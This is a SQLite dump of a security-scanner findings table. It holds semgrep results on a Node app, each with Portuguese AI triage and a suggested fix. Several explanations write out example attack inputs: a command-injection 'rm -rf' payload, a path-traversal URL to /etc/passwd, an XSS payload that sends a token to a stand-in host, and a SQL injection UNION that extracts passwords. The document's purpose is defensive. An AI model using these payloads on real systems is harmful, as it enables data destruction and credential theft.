PRAGMA foreign_keys=OFF;
BEGIN TRANSACTION;
CREATE TABLE findings (
    id              INTEGER PRIMARY KEY AUTOINCREMENT,
    scanner         TEXT    NOT NULL,   -- ex.: 'semgrep'
    rule_id         TEXT    NOT NULL,   -- id da regra do scanner
    severity        TEXT    NOT NULL,   -- HIGH | MEDIUM | LOW
    file_path       TEXT    NOT NULL,   -- caminho relativo ao alvo
    line            INTEGER NOT NULL,   -- linha do achado
    message         TEXT    NOT NULL,   -- descrição do scanner
    cwe             TEXT,               -- ex.: 'CWE-89' (pode ser NULL)
    lgpd_flag       INTEGER NOT NULL DEFAULT 0,   -- 0/1
    priority_score  REAL    NOT NULL DEFAULT 0,   -- ranking do MVP
    ai_status       TEXT    NOT NULL DEFAULT 'pendente',  -- pendente | triado
    ai_triage       TEXT,               -- verdadeiro_positivo_provavel | ...
    ai_explanation  TEXT,               -- texto pt-BR gerado pela IA
    ai_fix          TEXT,               -- sugestão de correção
    created_at      TEXT    NOT NULL DEFAULT (datetime('now'))
);
INSERT INTO findings VALUES(1,'semgrep','semgrep-rules.vanguard.md5-used-for-password','HIGH','lib/crypto.js',6,'MD5 é usado para hash de senha. Algoritmo fraco, quebrável em minutos com hardware moderno. Substitua por bcrypt/argon2.','CWE-327',1,10.5,'triado','verdadeiro_positivo_provavel','MD5 é usado para hash de senha em lib/crypto.js:6. Hash rápido, sem salt, quebra em minutos com GPU ou rainbow tables. Se o banco vazar, todas as senhas viram texto claro — falha grave sob LGPD Art. 46.','Troque por bcrypt.hash(pwd, 12) ou argon2id e migre as senhas existentes no próximo login do usuário.','2026-08-24 05:39:52');
INSERT INTO findings VALUES(2,'semgrep','javascript.browser.security.eval-detected.eval-detected','MEDIUM','lib/eval.js',4,'Detected the use of eval(). eval() can be dangerous if used to evaluate dynamic content. If this content can be input from outside the program, this may be a code injection vulnerability. Ensure evaluated content is not definable by external sources.','CWE-95',0,7.0,'triado','revisar','Este achado id 2 (eval-detected, MEDIUM registry) é a mesma vulnerabilidade do id 3 (custom rule, HIGH) — ambos apontam para lib/eval.js:4. A regra registry classifica como MEDIUM, mas o risco real é HIGH pois há input do usuário. Trate como um único item de trabalho.','Aplique o fix do id 3.','2026-08-24 05:39:52');
INSERT INTO findings VALUES(3,'semgrep','semgrep-rules.vanguard.eval-userinput','HIGH','lib/eval.js',4,'eval() executa código arbitrário. Se receber input do usuário, é remote code execution direto.','CWE-95',0,9.0,'triado','verdadeiro_positivo_provavel','eval(userFormula) em lib/eval.js:4 executa código JavaScript arbitrário vindo do usuário. Isso é remote code execution direto — o atacante roda process.env, fs.readFileSync, spawn de comandos, o que quiser dentro do processo Node.','Nunca use eval com input externo. Se precisa avaliar fórmulas matemáticas, use uma biblioteca sandbox como mathjs; para JSON, use JSON.parse.','2026-08-24 05:39:52');
INSERT INTO findings VALUES(4,'semgrep','semgrep-rules.vanguard.new-function-userinput','HIGH','lib/eval.js',9,'new Function() é equivalente a eval — compila código arbitrário em runtime. Nunca use com input do usuário.','CWE-94',0,9.0,'triado','verdadeiro_positivo_provavel','new Function(''req'',''res'', bodyStr) em lib/eval.js:9 é equivalente a eval — compila código arbitrário em runtime. Se bodyStr vier do usuário ou de config externa, é RCE.','Elimine a compilação dinâmica; carregue handlers de um conjunto fechado de módulos exportados.','2026-08-24 05:39:52');
INSERT INTO findings VALUES(5,'semgrep','semgrep-rules.vanguard.math-random-for-token','MEDIUM','routes/admin.js',12,'Math.random() não é criptograficamente seguro. Se usado para gerar IDs de sessão, tokens ou nonces, permite predição.','CWE-338',0,7.0,'triado','verdadeiro_positivo_provavel','Math.random().toString(36) em routes/admin.js:12 é usado para gerar ID de sessão. Math.random não é criptograficamente seguro — o estado interno é previsível, permitindo enumeração de sessões existentes.','Use crypto.randomBytes(16).toString(''hex'') ou crypto.randomUUID() para IDs de sessão.','2026-08-24 05:39:52');
INSERT INTO findings VALUES(6,'semgrep','semgrep-rules.vanguard.child-process-exec-userinput','HIGH','routes/admin.js',19,'child_process.exec com input do usuário. Vulnerável a command injection — um payload como "; rm -rf /" executa comandos arbitrários no servidor.','CWE-78',0,9.0,'triado','verdadeiro_positivo_provavel','child_process.exec(''ls -la '' + cmd) em routes/admin.js:19 concatena input do usuário no comando. Payload como ''; rm -rf ~; #'' executa comandos arbitrários no servidor. É RCE via injeção de comando shell.','Nunca concatene input em exec. Use child_process.execFile(''ls'', [''-la'', cmd]) que passa argumentos como array, sem shell; e valide cmd contra allowlist.','2026-08-24 05:39:52');
INSERT INTO findings VALUES(7,'semgrep','javascript.lang.security.detect-child-process.detect-child-process','HIGH','routes/admin.js',19,'Detected calls to child_process from a function argument `req`. This could lead to a command injection if the input is user controllable. Try to avoid calls to child_process, and if it is needed ensure user input is correctly sanitized or sandboxed.','CWE-78',0,9.0,'triado','revisar','Achado id 7 é a mesma vulnerabilidade do id 6, capturada por outra regra genérica (detect-child-process). Causa e correção são idênticas.','Trate junto com id 6.','2026-08-24 05:39:52');
INSERT INTO findings VALUES(8,'semgrep','semgrep-rules.vanguard.sql-string-concat','HIGH','routes/admin.js',19,'Query SQL montada por concatenação de string com input do usuário. Vulnerável a SQL Injection. Use parâmetros vinculados.','CWE-89',1,10.5,'triado','falso_positivo_provavel','A regra sql-string-concat casou em routes/admin.js:19, mas o código real é child_process.exec(''ls -la '' + cmd) — trata-se de command injection, não SQL injection. A vulnerabilidade existe (achado id 6 e 7 pegam ela corretamente), mas por esta regra é FP.','Nada a fazer nesta entrada; corrija a command injection pelos achados 6 e 7. Considere restringir o pattern-either da regra sql-string-concat para exigir um contexto de query.','2026-08-24 05:39:52');
INSERT INTO findings VALUES(9,'semgrep','semgrep-rules.vanguard.sha1-in-security-context','MEDIUM','routes/admin.js',35,'SHA1 usado em contexto de segurança (fingerprint/assinatura). Considerado quebrado desde 2017. Use SHA-256 ou superior.','CWE-330',0,7.0,'triado','verdadeiro_positivo_provavel','crypto.createHash(''sha1'') em routes/admin.js:35 é usado para gerar fingerprint de segredos. SHA1 está oficialmente quebrado desde 2017 (colisões em ~2^63 operações). Fingerprints com SHA1 podem colidir e permitir substituição.','Troque por crypto.createHash(''sha256'') — muda uma linha e é seguro.','2026-08-24 05:39:52');
INSERT INTO findings VALUES(10,'semgrep','javascript.express.security.audit.express-path-join-resolve-traversal.express-path-join-resolve-traversal','MEDIUM','routes/file.js',9,'Possible writing outside of the destination, make sure that the target path is nested in the intended destination','CWE-22',1,8.5,'triado','verdadeiro_positivo_provavel','Em routes/file.js:9, req.params.file entra em path.join sem sanitização. Requisição /download/..%2F..%2Fetc%2Fpasswd permite ler arquivos arbitrários do host — incluindo o próprio vanguard.db. Path traversal explorável sem autenticação.','Use path.basename(req.params.file) ou valide contra allowlist. Após path.resolve, verifique startsWith(uploadsDir).','2026-08-24 05:39:52');
INSERT INTO findings VALUES(11,'semgrep','javascript.lang.security.audit.path-traversal.path-join-resolve-traversal.path-join-resolve-traversal','MEDIUM','routes/file.js',9,'Detected possible user input going into a `path.join` or `path.resolve` function. This could possibly lead to a path traversal vulnerability,  where the attacker can access arbitrary files stored in the file system. Instead, be sure to sanitize or validate user input first.','CWE-22',1,8.5,'triado','revisar','Mesma vulnerabilidade do id 10, apenas capturada por outra regra registry (path-join-resolve-traversal genérica). Fix idêntico.','Trate junto com id 10.','2026-08-24 05:39:52');
INSERT INTO findings VALUES(12,'semgrep','semgrep-rules.vanguard.password-in-log','MEDIUM','routes/login.js',14,'Campo password (ou similar) escrito em log/console. Exposição de dado pessoal sensível em runtime — violação direta da LGPD Art. 46.','CWE-532',1,8.5,'triado','verdadeiro_positivo_provavel','console.log(''login attempt:'', { email, password }) em routes/login.js:14 registra a senha em texto claro a cada tentativa. Se os logs vão para um agregador (Datadog, CloudWatch), a senha fica lá por meses — violação direta da LGPD.','Remova password do objeto logado. Mantenha apenas email e um attemptId opaco, ou mascare com password: ''<redacted>''.','2026-08-24 05:39:52');
INSERT INTO findings VALUES(13,'semgrep','javascript.jsonwebtoken.security.jwt-hardcode.hardcoded-jwt-secret','MEDIUM','routes/login.js',17,'A hard-coded credential was detected. It is not recommended to store credentials in source-code, as this risks secrets being leaked and used by either an internal or external malicious adversary. It is recommended to use environment variables to securely provide credentials or retrieve credentials from a secure vault or HSM (Hardware Security Module).','CWE-798',1,8.5,'triado','verdadeiro_positivo_provavel','A constante JWT_SECRET = ''s3cret-key-please-change'' em routes/login.js:17 é usada para assinar tokens JWT. Qualquer um com acesso ao repositório forja tokens válidos e impersona qualquer usuário. Colapsa toda a autenticação.','Mova para process.env.JWT_SECRET a partir de .env não versionado; gere com openssl rand -base64 64. Se o repo já foi público, revogue todos os tokens existentes.','2026-08-24 05:39:52');
INSERT INTO findings VALUES(14,'semgrep','javascript.express.security.injection.raw-html-format.raw-html-format','MEDIUM','routes/profile.js',8,'User data flows into the host portion of this manually-constructed HTML. This can introduce a Cross-Site-Scripting (XSS) vulnerability if this comes from user-provided input. Consider using a sanitization library such as DOMPurify to sanitize the HTML within.','CWE-79',1,8.5,'triado','verdadeiro_positivo_provavel','Em routes/profile.js:8 o HTML interpola req.query.name direto na resposta. Um payload como ?name=<script>fetch(''/api/token'').then(r=>r.text()).then(t=>fetch(''https://atk/''+t))</script> executa JS no navegador da vítima — XSS refletido clássico.','Escape o valor antes de inserir. Use uma engine de template (handlebars, ejs) com auto-escape, ou faça res.render em vez de concatenar HTML manualmente.','2026-08-24 05:39:52');
INSERT INTO findings VALUES(15,'semgrep','semgrep-rules.vanguard.sql-string-concat','HIGH','routes/profile.js',8,'Query SQL montada por concatenação de string com input do usuário. Vulnerável a SQL Injection. Use parâmetros vinculados.','CWE-89',1,10.5,'triado','falso_positivo_provavel','Em routes/profile.js:8 a concatenação é de string HTML (''<h1>Olá, '' + name + ''</h1>''), não de SQL. A regra sql-string-concat casou pelo padrão genérico, mas não há SQL na linha. A vulnerabilidade real desse trecho é XSS, capturada corretamente pelo achado id 14.','Nada nesta entrada; o XSS é tratado pelo achado id 14.','2026-08-24 05:39:52');
INSERT INTO findings VALUES(16,'semgrep','semgrep-rules.vanguard.sql-string-concat','HIGH','routes/profile.js',8,'Query SQL montada por concatenação de string com input do usuário. Vulnerável a SQL Injection. Use parâmetros vinculados.','CWE-89',1,10.5,'triado','revisar','Achado duplicado do id 15 (mesma linha routes/profile.js:8, mesma regra sql-string-concat casando por outra branch do pattern-either). Também é falso positivo pelo mesmo motivo.','Trate junto com id 15.','2026-08-24 05:39:52');
INSERT INTO findings VALUES(17,'semgrep','javascript.express.security.audit.express-open-redirect.express-open-redirect','MEDIUM','routes/profile.js',15,'The application redirects to a URL specified by user-supplied input `req` that is not validated. This could redirect users to malicious locations. Consider using an allow-list approach to validate URLs, or warn users they are being redirected to a third-party website.','CWE-601',0,7.0,'triado','verdadeiro_positivo_provavel','res.redirect(req.query.to) em routes/profile.js:15 aceita qualquer URL do usuário. Isso é open redirect — um atacante manda um link /profile/redirect?to=https://phishing.com que aparenta ser do domínio da aplicação. Usado em campanhas de phishing.','Valide ''to'' contra allowlist de URLs ou hosts internos; ou concatene com um domínio fixo permitindo apenas o path relativo.','2026-08-24 05:39:52');
INSERT INTO findings VALUES(18,'semgrep','semgrep-rules.vanguard.sql-string-concat','HIGH','routes/search.js',12,'Query SQL montada por concatenação de string com input do usuário. Vulnerável a SQL Injection. Use parâmetros vinculados.','CWE-89',1,10.5,'triado','verdadeiro_positivo_provavel','Em routes/search.js:12 o parâmetro q vindo de req.query.q é concatenado diretamente na string SQL. SQL Injection clássico: payload como %25'' UNION SELECT usuario, senha FROM users --  extrai a tabela inteira. Impacto LGPD máximo (vazamento massivo).','Use parametrização: db.all(''SELECT id, name FROM products WHERE name LIKE ?'', [''%''+q+''%''], cb).','2026-08-24 05:39:52');
INSERT INTO findings VALUES(19,'semgrep','semgrep-rules.vanguard.sql-string-concat','HIGH','routes/search.js',12,'Query SQL montada por concatenação de string com input do usuário. Vulnerável a SQL Injection. Use parâmetros vinculados.','CWE-89',1,10.5,'triado','revisar','Duplicata do id 18 — mesma linha routes/search.js:12, mesma regra casando duas vezes por pattern-either.','Trate junto com id 18.','2026-08-24 05:39:52');
INSERT INTO sqlite_sequence VALUES('findings',19);
COMMIT;
